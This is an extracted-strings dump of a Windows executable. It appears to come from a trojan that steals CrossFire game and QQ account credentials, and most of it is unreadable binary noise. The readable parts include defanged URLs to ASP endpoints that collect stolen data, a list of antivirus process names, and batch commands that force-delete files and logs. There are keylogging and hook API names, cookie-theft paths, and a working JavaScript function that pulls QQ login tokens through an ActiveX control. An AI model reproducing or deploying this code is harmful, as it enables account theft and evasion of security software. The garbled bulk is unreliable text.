!"%)*#'(%)*)./',-(-.' ,&* &  '  *./#&&

!$%"%& /0'  )-.*./ /0,01

!" "#!$%

##!$%(,-!$%

!!"&'#'(!$%#'(#()#&'#&'%* ,12*-.

#'($))%()%)*(,-(-.',-#(($()"%& /0/34!%%

#&&( , /0)-. /0&)*'*

""!$%' ,!$%

""#'("''

##"$%"&'$'(&)*"%&

"%&#''' ,$'(%()

"$$#''"%&

"""%& ##

""%'(#&&

! ##(  !$%

"#!#$ #$ $$

"#"&&%))),-!%%

## $$ $$

##"%%#&&

""!%% $$!&&$))"&&',,

""!%%!$$"&&!%%

""#&& $$#''

#'',11!$$

!$$ $$!%%#&&!%%

!! $$%**

!!!$$#((#(($((

#&&$((&**

##!%% $$#''"&&

!" "# ##

%%!%%%))%))

%))"&&!&&',,

$$"''"%&

!%%!%%&**#''$((#''"&&%**%))&  %** $$

"&&!&& $$

#$ %% $%

##%)*#'(

#()!$%"%&$))"''#()"'' $$#''!&&&** $$

"&&#''#''#''

"#"&' #$

!%)*#&' $$"&' %%

#$"&'$() %%$'(&)*&)*

!!%%%))$''$((#&&

#$!$%!%&

(,-'--!&& $% $$ $% $$#'(#&'!%%%)*"%&

#'(#&'"&&#'(#'(#'(#&'

"" !" ###%&

#$"$% #$%)*#'(!$%

"##''$()$()#'( $$#&'$()%))%* !%&#(( $%

#$)./#()#()#&("%'"%'!$&

[LoginUserRecord]

IsRecordPass=0

Client.exe

LoginQ.dat

Msimg32.dll

crossfire.exe

9<=012;=>}

/0/(((--,---((("##((('('

'''%%%   ''&$$$(((()('('

(((***)*)

&&&$$$%%%* *

   ,,,)**%&&)))

$%$%%%* *

%$$&&%(('332,, $$# ,*(('('' *)('' **''&''&)(((('

887/-,('&&&%&&&

** ))***   ,'()&&''(),,-

** ))*''(

%%&()*%%&

()** ,''($$$%%&**

.01** $$%

&&&<<<100

!!"!!!"""###/..=<;'&'$$%&%&*)**))%$%&&'*))''''&'%%%

445-* ,**,  *)*

(()  ,--..-/001-./''(()*

%%&%%&'((

))*&&'''((()--.

)()(()767?>>#""

&&'""#--.

%%%&&%%%%#""@??///&&'''(%$% ))/..&&'* *(((   *))

557 ()-***()*)

,,-''(('(436//0--.))* ,-

,,-(()&'(

()*--.,,-))*''(

))*(()(()()*()*

((($$$$#$:::888&&'   )())(), ,*)*('( * , ,*)*

757*)****'&'(()

''(** (()(()''((()&'()*

()),,-  ,

001-,.* ,

))** ,''(

012--.  ,,,--..,,-

&%%  ,('(:9:@?@)))-,,***,,,-,- **)))('(, , *

  ,** 111*) 234  ,))* ,-

)**  ,))***

  ,../012

../--.* ,  ,

//0000** 001001//0667--.

001../ ,-888

))*** ./0./0

223122 ,-  ,  ,001//0223

234324../  ,

001  ,**

113112//0

  ,** ../ ,---.001--.

,,,000/..

-,-.--...100

?>>=:9544,,,/./

999112  ,001**   ,223122

556445445345

-./--.-..

--/234//0

001-./  ,--.001

IIIJJIDDD...DCD:::000, ,...222666322544///../---211

?>?322../111:99

../,,-00112355698999:889

--.,-.//0

223445001...532//.../421000

///** )))/./

,11),, $$*/0$(("&&!%%"&&"&'*/0'**$((!%%&))#&''  !$%!$$ $$&))#''

##%'("''',,).. 01 00(,-*00&** /0(,- /0'  !$%

$$%**%((#&&"%&"%% "#

'* #'(%))!$$%()

!!!%%$'("&&

""#&'(  ' ,%**$(((--%())..#'(

!"&* %)*&* &* "&&'* !%%

!! ##( ,#&'

"%&-33' ,$((&* "%& #$#&&$''!$%',,(,-(--).. 00)./

""%())--%(('  #&'

""&**'*  ##(,,*..

"$%&**&**#&'#&&',-',,&* $))#&'$''&))$()%***//&

##(--',,&,,(--(--(--$'((  %((&* "%&*-.$((

#'''  %))#''

##&)*%))$(("%&$()' ,'  "&&(--$))

""#((.44(--(--',,&  &  "&&,/0),-(,-"%&$''

!&* .33(,-)-."%%

!!!%% ## "#&* ',,!$$

!"%()$))!&&(--066*00(..(--(..%**$)) #$#''&))( ,!%&!$$

""-11 01#&')./#'(

""%()"%&#'()--&))

""'  /44$))$))-33 00',,',,*00 11&

!%&#&'%)*$()#&&)--&))&**"%%%**)-.

$&'(,-$''"%&'  -22( ,%**)..$))#((',,',,*00(--/55&

$%(,- 11*-.)--#''%))&))$(('  &**

)..)..)--',,%**%((*00&,,"&&&  ',,%***00%***00/55(--

( ,/45',-,00(  (,-( ,"&&#'''  )-.

$$*00*./$()' , 11.44,22$((%**)..&  *00,22',,(..067&**

&* '  #&&#'( /0'** $$ ###&' 01-23',,

"&&$(($() 00 00

##177',,$((&,,(--,22 11*00&,,/44066(,-

 //( ,!&&(,,$((!%&"%&$'((-.-22067#%&

*..,12&

*//.44%**(--(..-33-33 11$((.12278177'

##'* '* .34045&  $(( #$(,-*///44.22$'(

"#*00178.44

,22(..*//-33).. 11 11%**)./( ,,12399)..

#&&' ,*-.045'* ',-"&''**),,',-(-.*//$'(

%**-23066 11)//*//-33*//)..#((#''%**%)*( ,%** 005;;"&'%**-12-22' ,)./&

""$'(%))$((&)*)-.,12

"#$()',,)//288&,,',,*//(..$))

"''(..)..'**#&'$((3786;;-11-23.44#''!#$

"&&&))#&&$((%**(,-)-.',-',-(--).. 00%**%**$))

!!&  *00)..)--#'((-./33-22/23'  (,, 00"&'

##%((%(('  &  "''(--(--(-.& ,*/0,11*00)..(--&,,!&&

!!%** 11 11)//%** 00166/44,11-22),-*..'* !%%.22%))'* $))!%&!%&' ,*00',,$()(--*// // 00)--#&'!$% ./155 11-22 //(,, 11.44.45.44(-.%)*$()#((.22-34' ,$()%()!$%$'(&* *./',,)//&* $(( /0-22%))$((/44389067)-.&**-22-12 12)/0.44.33 00$((#&'066.45,22%**#'('* $(( //)./ /0 00 11!$%

!%&$((&***01"'')//,23 12,22.44$'(&))

#(()./)--&* 3::167)-.&  ,22-33,22',,*//-33,23,11-23%**

!%%,22/34(,,055.33/44-22-23&()*-.(-.

%)*%)*%**,12' ,&* %**(,- 01177*00(-.*00,12)..,235:;-12

%**,12-22055)./-22.34-23)./&* 056-23

#$*..),-'**!$%

""$((&**-33,/0)//-23/45*00(---334:;&*

"''( ,',- 00 /0.45,22(-.' ,-12.23155

"&&,12)..!%&

"&&"%%,22*// 11*./.44/55 01(-.-33.34#'(

( ,*../44/45,00.44(..%)*&* ( ,178056

',,)./$((

!"#()&  "%&!$%

#$' ,*//

$$"%&&*  $% #$

%%%**%**!%%

$%"%&#&' #$

!%%!%%%)*"&'!%%

#$%)))--

!%%%()"%% $$!$%

!! #$!%% $%'**(,-

<>>/00&&&

000)))&&&!! //.

 ./034034

""-00255134

 -.489-01477699

(* 8;<9<=478 ./2557;<

%%%(((

))),,,...

tc_url=[

cwburl=[

pay.title=[

hXXp://

hXXps://

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

HTTP/1.1

Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Content-Type: application/x-www-form-urlencoded

.rsrc

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

del /f /s /q "C:\chuanyuehuoxian\*.exe"

del /f /s /q "C:\chuanyuehuoxian\*.bat"

del /f /s /q %systemdrive%\*.tmp

del /f /s /q %systemdrive%\*._mp

del /f /s /q %systemdrive%\*.log

del /f /s /q %systemdrive%\*.gid

del /f /s /q %systemdrive%\*.chk

del /f /s /q %systemdrive%\*.old

del /f /s /q %systemdrive%\recycled\*.*

del /f /s /q %windir%\*.bak

del /f /s /q %windir%\prefetch\*.*

del /f /q %userprofile%\cookies\*.*

del /f /q %userprofile%\recent\*.*

del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"

del /f /s /q "%userprofile%\Local Settings\Temp\*.*"

del /f /s /q "%userprofile%\recent\*.*"

TCLS\Client.exe

avp.exe

ashDisp.exe

ccSvrHst.exe

avcenter.exe

secenter.exe

spiderui.exe

egui.exe

mcupdui.exe

KvMonXP.exe

RavMonD.exe

kavstart.exe

360sd.exe

FilMsg.exe

360Tray.exe

QQPCTray.exe

BaiduSdSvc.exe

/id.txt

post_asp3.asp?Number=

/post_xinxi3.asp?name=2051C9

/post_xinxi3.asp?name=

/post_xinxi.asp?name=6986

msxml2.XMLHTTP

hXXp://w1d2wodescak.a5.namepu.com/

858583725

VVV.3600gz.cn

VVV.meitu.com

?.rNho

J)ui%d

hXXp://open.baidu.com/special/time/

window.baidu_time(

hXXp://VVV.xici.net.co/

\Mdserver.ini

/regdate.txt

/delf.asp

MDserver.exe

100 = 100

(MDserver.exe),

\MDserver.exe

.pHp 7

.PET`pV

/Cp.dB

k\\%Sy

u.HsL

Ey%fpml

5l\UWSSHh

e.APS

.htc(:

@.Be$>;

%Do2P

.odNh

"&HK.fJ

fDRÔ

p(.vp

JKpJ.HW6

A.tCD

IG-%um

%uDQ'%,m

.omc0d

.dll,OpenProcess

hXXp://e.*9

p00gz.cn|

O.OPP

*1%*.*f

CNotSupportedExceptionk

_CmdT"

E,.MSVCRTgr

.PAVC@

(&07-034/)7

V2.ZN

zcÁ

4Gl.chs\S

qg]Key

ADVAPI32.dll

comdlg32.dll

ole32.dll

OLEAUT32.dll

SHELL32.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

RegCloseKey

ShellExecuteA

Mdserver.exe

Mdserver.ini

\QQLogin.exe

/id2.txt

/post_xinxi.asp?name=

\MDserver.ini

hXXp://w1d2wodescak.a5.namepu.com/bug/post_bug.asp?bug=

hXXp://VVV.pet1990.com/?gy

Super-EChXXp://VVV.super-ec.cnhXXp://VVV.eyybc.com/forum-17-1.html/forum-12-1.html/memcp.php/ip.asp/time.asp/gonggao.txt/ec-user6.php/ec-bd.php/ec-jh.php

hXXp://VVV.super-ec.cn

<input type="text" name="field_2new" size="25" value="" disabled class="txt" />" class="txt" />Function Getcpuid()

Set cpuSet = GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("Win32_Processor")

getcpuid=cpu.ProcessorId

User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)

InternetOpenUrlA

eyybc.com

super-ec.cn

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HttpAddRequestHeadersA

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies

\*.txt

scripting.FileSystemObject

%Documents and Settings%\IBM\Cookies\*.txt

Content.IE5\

(@ole32.dll

858583725

QQ.txt

|*.txt

.mKD1

.Ckg4

(.gi6

hXXp://pan.baidu.com/s/123q7b

.LP&_#

.aVPX0

I%FI8

[email protected]

E.fW*

/30/15/7

]~.DS

cERT

U%XR

V.gk-

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

VVV.dywt.com.cn

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

%d%d%d

rundll32.exe shell32.dll,

(*.htm;*.html)|*.htm;*.html

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

Fckh/message.txt

ge.txt

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

WinExec

GetProcessHeap

RegOpenKeyExA

RegCreateKeyExA

GetViewportExtEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetViewportOrgEx

SetWindowsHookExA

GetKeyboardLayout

VkKeyScanExA

keybd_event

RegisterHotKey

UnregisterHotKey

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

.text

`.rdata

@.data

%FN~{

%CGKka

mV2.AHBC5D;<<(-

oledlg.dll

RASAPI32.dll

WININET.dll

&*397@@>?92-#

$/.EI!

!>VeptcP8

.GZ\K/

<Udp^K6'

1, 0, 6, 6

- Skin.dll

88.88.5.41

{7BF80980-BF32-101A-8BBB-00AA00300CAB}

(*.*)

8.2.1.1

%original file name%.exe_1100_rwx_00401000_00252000:

t%SVh

t$(SSh

|$D.tm

~%UVW

u$SShe

atl.dll

user32.dll

kernel32.dll

wininet.dll

gdi32.dll

MsgWaitForMultipleObjects

ExitWindowsEx

MapVirtualKeyA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

GetAsyncKeyState

GetWindowsDirectoryA

UnhookWindowsHookEx

GetKeyState

hXXp://VVV.pet1990.com/tmp.asp?id=

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

adminakang_kn_VVV.52blt.net_sujiankangwoaini!

crossfire.exe

!#$"$%"$%"$&"&&!$%!#$

#$"$%"$%!#$!#$!$%"$%"$%"$%!#%!#$!$%!#$

%'(#'("$%

#$#'(%()%(*%(*#'("&&#&&#&&"$&"&&%'(%(*%')#'(#'(

%)*%)*& ,& ,&  &  &  &  &  &)*&)*%)*%)*#()%)*%)*%(*&)*&  & ,

*./*./*./(-/*./ /0*./(-/(,,(-/(-/(-.' ,' ,&,,&  &,,',,#(*#')

*-.*-.(,.( ,

$$!$%!$$"&'$''#''$(($())--

!$%&** ##!#$#&&

""%((!%&)./ 01' ,"&&

!"'($'($&'$((%)*#''

!!&* %()#''"%%%* %)*'  #&&'**#&&%((

#'(267289',- ##

!""&&%)*!&&

!" %%%((')* #$

##( ,067*01

#$$'',22.34%))%()

*//#'( %%%))')*.33%* #&&*-/!$$

!!#&&#%&

""'**&**

!$%%(((-- /0"&&

!!"''&)*,00,00055"''

"%%)--'

""!%&#''-22 11,11

$''$() 01

%()#''*./'

#$!%%"&&#&'*--,01)--

&  $()044

%)*$''%()),-,12,00

*.. 00.22

###&'%))!%%

"# %&#&'.12(,,(,-$''

(--)--,12

' ,5::)..267$''*.. #$

)..-11$((

!!#&&$((

$'('**(,,),-'***..-22%()"&&

(,,%))%))

'**%)*"'(

"&&.44 /0

%((,00*./

$$ 00#''

%**)..(--&  !%%

-33-33!&&$)))//&  $(()..!&&

""%))(--

!&&!$$#''%**

.33#((!%%

!!(--)//%**'--#((&  $((',,)//)//

%**"&&%))!%%!%%"''

""!%%%**&  %))

%%*//(..',,(--&  $))%**&  )//&  )//#&&

)--"&& ##"&&"&&!&&

!%%'--(--#''

#((-33%**#''*00'--

## $$%**%**,22)..

""(  "%%$))

###((&

%%!%% $$ $$/55,22!%%$))#''(--(..

!%%#'' 00)..

!%%!&&"''

"""&&%))$))

"""%% ##

!!!$$#'' $$

#((&,,%**!%%$))$(($))$)))..$((!%&#'(

!" ###(()./(,-' ,#((%* ),.)-/$'(%(**./#&(

!#&((,.)-/' -%)*

##$((&**#&&'  #(("&&#(($((#''&  '--(--

!!"''(--(..'--(..%**' ,%)*'*,'*,&*,&*,$')

#&(*.0*.0*./&) &)

!! #$ ##

!!%((,11

#&&.22'  !$$$))&   $$

!$$"&&#''%))'  "''!&& 11*//%**%  (--#((!%%&  & ,%**',-"&&#&'#&()-/*.0$'((,-(,-"%&

#%%&** ""#&&

#'')..)..(,,%**)..)..(--

!%&&* (,-"&'' ,-23(-.%)*&* &* )./$()

#(((,, 00"%%

'  '  %)))..$))'  (--(,,%** 00

!!"%&#&&

&* */0&* &* )./

(,,#'' 00&**%(((,,)--',,(---22

)--&* &**

( , //%)*' ,

$)**./*-.

$)*)./$)*$'(&* (,,'  (,,)..

*-.)-.%()

%)*)--' ,&*

!&* &)*& ,(--(-.)./',-

#&&( ,%()

'* &* ( ,'*

#'(' ,#&'(-.

!$()$'(' ,& ,',-& ,*//

*.0-13.24

#&('*,&)*' ,

.23!%& $%&  #&'' ,$()%)*' ,& ,

' ,)-.057

"$ #% /1

%(*&*,%(*#&(

##&))&**

###()!%&

'* %)*%* )-.-23$)*$)*%()',-& ,

%(*)-/( -

,02#&( /1

,02%(*"%&

)./(-.#(($((*/0

& ,*./)-/*-/

046 /0#&'

%)*$'()./' ,$()#&&"&&

!"*//*/0',-' ,%)*(,- 01' ,&* %)* $$(-."%&

#'(' ,#''"&'

#&'$()%)*%*

#$' ,(-.& ,%)*' ,%)*& ,&* "&&(,-%**!$%

!"&*  01& ,

#&&!%&%()"&'$)*'* !$$$))%* #'(%)*#'(

%**)./%)*"&'$(($((,12)-. #$#&')-.$((

!"#'(',,*/0$()

! ##"%&#''

!!(-.( ,#&'"%&#&'$()#''$'(%* %)**./& ,!%& #$*./& ,)-.%**$((%**&* ,12$()*./*/0%**"%&

)-.(-.)-.(,-%)*

#'&*.#& #&

%*.DJP

 /5/49*05 $(

& .EOW=GO"(,-37-27

 /4-26*.2

(()$$&)*,%%&""#!!#%%(&'($$&%%&

f].WJ

5)!2)!/(#0(!:

?! #7%""

&'),.1#$&(( -/2(*-

5/.bY*[R'VN*^T&PH

!'#%6,)8/

-A==>>XZZNPO7<9)[8(g<*k>.rC*i=

y.JB<dXH

Enb>aV1MD7WN9YP5RJ5SK/86TUUNOODFE354.R:.wF.tD,nA-pB

%&&KMMdeeVYXDEE<=<&8-,oA.qB-oB/tD

...9;;\^]mnnPSRFHG)0,0iC/sE.qD2{I

%[7$f:(n>%c: U1

O/.tE*_<*1.8::ACB###!2,x

"R2.uF2uI0C8365DFF576'94}

Z9}P.dB

...ijjSUTbcbSSSVWWCEE3B:7

R,@;!/,

)76 :8#.-!- #0.

K1%_;'d?%`<0tL.qI2|O4mL&'(-..?@@JKKMNOJKKPPP##$

g;)tI-pI.sG/iE =%

K.qC*o?'yE)a9 M(

6%.X=@|U4vJ.iA%S4*X9:wNF

-""P2.lD g>&X7

/:51;71<81<8

1;71=81;7/;7

%O4/kD.lC c>

7A<"H/ d>.kB*c>%W5

H-,[email protected],i?*e=/mC1sH#Q3

888889233

").CEd

%$%%)  '('))&/0/.11&)(

I3!V=%U?3EILfkRmtOipTovRlsb

J4'dF nL.GDQkvWrxVryXt{Qjqe

L4 U;&dD*mM,tQ.oQ?VXNin[z

/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=

'&U3CDBCDAAB@8:86nH0uF

%%33;;;

888888222

...KKK

///,,,%%%

,,,'''"""

///&&&!!!

$$$%%%!!!...:::000222,,,000///666)))

%F:&F;-LB'G<&F; K@)J>9WN#60

, 122,--

!!#''"&& ##

""!$$"%%#''#''

""$(( $$

*//)//#''"''!&&"''!&&%))$))#''

$$ ##!%%#''

"" ##%))&**&**%))!%%#((%  &  &  "''$))

!! ## ##'**&**'  %))

!!#(()--$((#&&&  #((

#'' $$ ##

&))#'')--%))"&&#''$((%))"&&

$(()..%(("&&$((#((#''(,,(,,#&&

$$$((!&&

!%%"&&#(("%%"&&$((#&&&  %**(,,

###''$((

!!!%%!$$!&& %%$(($''&**$((#((

""!%%!%%"&&#&&&))$((

!!!%%!$$ ##

#''"%%#''(,,#&&$(($((

&))(,,#&&

""$(('**

##!$%%((

$$#''!#$$''

!!!%&%'(

## $$#&&

"# $% $$$((!$%

""&* &()"&& $%

"#!%%#&&

!$$"%&$''"%%&))&)*#'' $$

!""%%!$$

"" $$ #$"&&%))#''$''

!!#$%%),!$%$'' ./(-.

""&   ##

###(( %% $$

!$$ ## ##

""#''#''

##!$$$((

""'--#''&**)//

##!%%%))*00#'''-- %%$))%***00$))

###((!%%$((!&&$((',,',,$))#((*00&

##&**#''

"''%**"''"&&

$$)..',,

!!%**#((

-22#'' %%%**&**',,',,

&  %**%**',,*//*00#''

!&&!&&$))#((

#'' 00"''!&&(..

!&&)//)..%**).. 11$))

"''',,%**"''#((

#((-33 11',,

(..&  !&&(--)..)..

""#''#((&

#'',22 11(..&  $))

&,,!%%*00',, 11

$$#((#''

!%%(..-22)//

$))&,,)//

*//(--%**(--

!%%(--$((

"&&%))$(("''"''#((

##!%%#((#((

!%% 11,22'  /55

$))*//&

,22'--"&& %%

#&&#''!%%!$$

%%#(( 11 11(--'--)---33

*// 11 11 $$$))

$$!$$#''#''

!%%!%%"''',,)..(--$)))//'--

!!%**#(( 11'--',,(---33

##!%%!%%

!%%%  $))&  &  &,,*00)//&**

!&&(--$((',,-33/66

"" ## ###''"&&$'''  )..

$$!%%%**',,#(((--',,%  '--,22&,,

#'')//)..$))(..

##"&&$((%))&  "&&

$$%**%**&  ',,',, %%&  (--)// 11

$(( 11(..$))

##$((!$$

!!#'' ##

!! ##"&& ##$''',,',,

$((%**&  &  $))"&&%))'--(.. 11(-- %%

(,,*//(--

!!"&&#''

"""'' $$

##"&&"&&#''"''$))',,$))

""#'' ## %%"&&#''',,$))$((%**%**

!!%**)..(--(..*00',, 11',,',,',,%**$))

""!&&'--&,,(--(--',,$))',,$((%**%**(..

"&&&  (--

$$ $$"''&**$(("''#(((--

""!&&',,$))(--)//%**

*00,22(--(..!&&!&&*//(..%**

!!$(($((

!%%&  %**&  "&&(--%**(..

066%**',,&  .44.44$))',,

(--3::-33!%%#''*00-33',,,22

(--$))(--/55(--)//&,,%**

%***00$)) %%#&&#((*00%**%**066$))

$))&,,/55*//#((',,',,',,

!!#''#&&

&  ).. $$

##"''#&&',,'--*00!&&)//

%%!%% $$&  ',,',,#(((--

##"''!%%*00)//(..*//%**)..,22

"" $$&  "''%**%**(..

##!$$ ###''&**#((

(--$)) $$

## %% $$!%%&,,(--%**

$))%** 00

-33 $$!%% %%#''%**

$$"&&%**&,,&,,',,

%**/66#((#''',,(--

""!%%"&&!%%

%   00$))

!! $$"&&)//#''$)) $$

##(..',,',,(--,22$)),22%**)..$))$((

$$!%%#'' %%

$((188&,,-33"&&'--

&  )//#((&  #((%**)//,22,22 11"&&!%%

##)--%**

!%%!&&!%%!$$#(($))%**$))%  '--"&&!&&

## 11%**"''$))#(($))$))(..177%**(--%**

%))*00$))$(( ##

##$)))..$))#((!&&

!&&,22',,!&&&  ',,"&&(..&  *00-33(..#((

!## $$ $$

"" ##!$$ ##

$$ 00#''!&&#'' $$

$$%**)..(--&  !%%

-33-33!&&$)))//&  $(()..!&& 11-33)//

""!%%#(((--

#''$))!%%"''

##"&& ##"''$))$))$(("&&

!!#((%**

!" $%#'' ##!%%#&&!&& #$!%%#&&

"&'$(($()&)*

""#'($()%)*'*  /0%)*

!$%$'(&)*&))"&&*..

###&&"''

!%%"$%$'($''#&&%))#'(#&&$'(',-)-.

!! #$#&'%**#%&!$%"%&#'(%**!%%&**"%&

!""&&'

##$(("%%#(($''&*

"&& #$%  $''%((

#$%**(,-$()&))&()

%**&**)--$))

!&'#'("'''  )-.#'( ##'***./(-.,23-34

!%&&  (--

$$ "#!%%"%&%  %*

$((#'($'()./%()

##',, /0 /0

!*...23(,-$()$))&**(--&))

)...34&**

%)*'   //

%)),01044',,"&&

'  -23,12(--(,-

!"#'' ##$()%((&  "&&

 00' ,%)*/66066.44

"&&%)) $$

'  %)*$(($)*

$()$))%**(,--11#&&

')*&* & ,%**',,,12

$$!%&#&'"&'"%&

& ,177)//

),-%)*& ,(,-)./#((

#'(&  #'(

$%!%&"%&&**"$%

%().35 00)-.(,-

$)*#'(',,' ,&

$'( //)-.)-- 00(-.& ,

"&&%)*&**),-#'(

&**&   $%!$$)-- 00)//&* *./)..%**&* $()$)),11#'("&&

%))"&'178.55 //*..)--*..$)*

#$',,,12#&&%)*(,- 01

""'**#(( ## $$(--&

""#''&***../44#''&  )-.&**& , 11$((

%**',-&* *..,01' ,

###''!$$!$$#&' 00&

"%&#'''   $$$'(&**%* %))%)*)-. // ##

!$%)-.*00&  #&&

#$ ## #$ ##!$$"&&"%%'  (,,#&&

$$$(( #$

!!$'( //%**' ,%)*)-. 11',,

%**"&&%))#&&

## $$!%% ###''#''

!$$"''#''"'' $$"''"'')//%**

"%%#&& ###&&)--!$$!$$*//

##$((%))

## %%%))(,,#((&  .33&

#((#''#(()//(..$))#(($))&,,(..*00,22',,

!!!$$ ##

#&& //$(('  ,22"%%$((

!&&%**(--'--%**',,066$**$**"&&"''(.. %%!%%&,,'--,22(--',,*00177

##$((!$$

!!!%%#&&&**288$''

#''#))%))%))$))%  )..%**%   11&   $$

!!',,(--(--)..&,, 11',,*//

!!$((!$$#&&$))

##&  &  $**&**&  $))&,,'  "&&&  '--

$$%** 11(--(--%**)..(..$))$))

!%%'--$))

##(--'--(--',,(--',,(--*00&  &

&  "&&%**%))%**%***//$))"''$))

## $$$))*00)..(--

*00$))&   00

###'(#&&

$$$((&

""#(()..)//(--)//

(--&  (--

',,',,%**

!" ##"&&#&'

#''&**' ,

!#'(*./'**#&&#''*./&**$(( //)..

).."&&$()

##"''$(()..*//%**'* *01*// $$

)./!%%)-.

)--%)*'  (,,'  %)*#''&*

!"#'(!$$ 00

*/0#((,22)..( , // 00)..

#&&&)*& ,&* %**)--(

(  -22(,,%))&,, 00(--

(,, /0278',,

$''%(("&&$''

!!$()%((%  *//*00

"""&&)--

##%()#''

"%&$(()--

#$%()' ,%()',-%()&  &* */0.45/45!&&

"&&$((&

%))(,-(  )--

##$)*$((#'(

!!"&'%((#''%**',,)..399066 $$

!!%((!$%

!!$$'* (,,#'' ##!&&!$%%)*#'(

""!%%'**'  %* %*  //377$)*$)*(,,',-%'(

!%%&* $(((-.(./177-22

"" $$$'("&'#&& ##

##$))$'(#&'

%))'  %))%()%**%**%))156',-"$%#''(,,

#''(--$)*&)* //*00 11&**

!" ##'   $$

%))&**#(( //'  ),,(,,%)**/0(,,#(("&& #$

)// 01',-&  $()'**,12)..%**

""#''"&&$''&))

##(--!%%#''"''#''$**$(()..'--$))"&&#(( %%"&&',,(..(..'--$((&  (--)//*//%**(--$))

"" ##!$$%))(,,

!! ##-11#((!%%"&&!&& ##!&&"&&*..(..)//(--

$$&   11'  &  )..&   $$$))*//(--(--"&&$))!&&(--

""&**#''

""'  $''"&&%))%))#''"''

#'''-- 11(--&  ,22'--%**&  ',,(--$))

%%)..(--!%%$))$))-33

## ## ##

!!"&&&))

!!$))&))&   $$&  &,,

#(('--',,-33'--%**(,,',,&,, 11 11%**

$(((--%**)..$))

!! $$"%%

!!!%%!$$ ##!%%$((',, $$!&&'--&

##%))&  '--$**&**(--&  *00).. 11',,

%***00&,,"&&

%**$**%**%))(--'--*//(--',,,22-33

.44,22$((

## ##$((

'  #''#(($((*//-44

(..%**"''&**%**&,,&  )//

##177',,

!$$!%%&**

!%%#''%**

(..%  (,,-33'--)//

&,,'--*00

"''&**%))!&&

##$**%))*// 11(..

)..%**&

(--"'' %%$))(--%**(..',,

',,066 11)//

"'''  $((&,,

',,&  (..(-- 00&  "&&

(..(--)//288&,,

)..#((#(((..).. %%

&  $(()..)..%**(--).. 00

#''$))#''$**

(,,)//',,%))"''&  #((!%%

##%**%**

 11(..*00)..(--

"&& 11#((

 11*00(..',,

#((&  ',,(--%**

$))#''$((

'--#(($**(..

""%)))//',,',,(..*00(--)..%**,22&,,*//"&&

$''$))$((

)..)--(--&

##)//(--%**$))',,',,*00)..*//',,).. 00 11 $$

!!!%% $$

!!!%%#((#&&#((&  #((

